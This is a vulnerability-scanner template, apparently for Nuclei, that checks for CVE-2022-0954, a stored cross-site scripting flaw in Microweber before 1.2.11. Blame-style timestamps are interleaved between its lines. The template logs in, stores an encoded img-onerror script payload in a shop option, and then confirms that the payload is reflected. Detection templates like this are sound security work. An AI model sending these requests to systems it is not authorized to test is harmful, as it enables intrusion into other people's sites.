2022-07-26 18:09:48 +00:00
id : CVE-2022-0954
2022-07-26 12:44:16 +00:00
info :
2022-09-16 19:50:10 +00:00
name : Microweber <1.2.11 - Stored Cross-Site Scripting
2022-07-28 16:19:23 +00:00
author : amit-jd
2022-09-16 20:03:07 +00:00
severity : medium
2022-07-26 18:03:38 +00:00
description : |
2022-09-16 19:50:10 +00:00
Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability.
2022-07-26 12:44:16 +00:00
reference :
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
2022-07-27 05:48:08 +00:00
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
2022-07-28 16:19:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
2022-07-26 12:44:16 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-0954
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00144
2023-12-12 11:07:52 +00:00
epss-percentile : 0.50048
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-07-26 18:06:21 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,xss,microweber,huntr
2022-07-26 12:44:16 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-26 12:44:16 +00:00
- raw :
2022-07-26 18:03:38 +00:00
- |
2022-07-26 12:44:16 +00:00
POST /api/user_login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username={{username}}&password={{password}}
2022-07-26 18:03:38 +00:00
- |
2022-07-26 12:44:16 +00:00
POST /api/save_option HTTP/2
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Referer : {{BaseURL}}/admin/view:shop/action:options
2022-07-26 18:03:38 +00:00
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
- |
2022-07-26 12:44:16 +00:00
POST /module/ HTTP/2
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Referer : {{BaseURL}}/admin/view:shop/action:options
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
2022-07-26 18:03:38 +00:00
matchers :
- type : dsl
dsl :
- 'contains(body_2,"true")'
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
2023-06-19 21:10:30 +00:00
- 'contains(header_3,"text/html")'
2022-07-26 18:03:38 +00:00
- 'status_code_3==200'
condition : and
2023-12-29 09:30:44 +00:00
# digest: 4b0a00483046022100f47325bc42307a32f6e2e4472aed48c92bbf1db2f9ec0f10f846f2f2a6007d2a022100bf6b71c098e00a511182bad5b21462afc1419e5fe4f57c4d45ae878d1f50da82:922c64590222798bb761d5b6d8e72950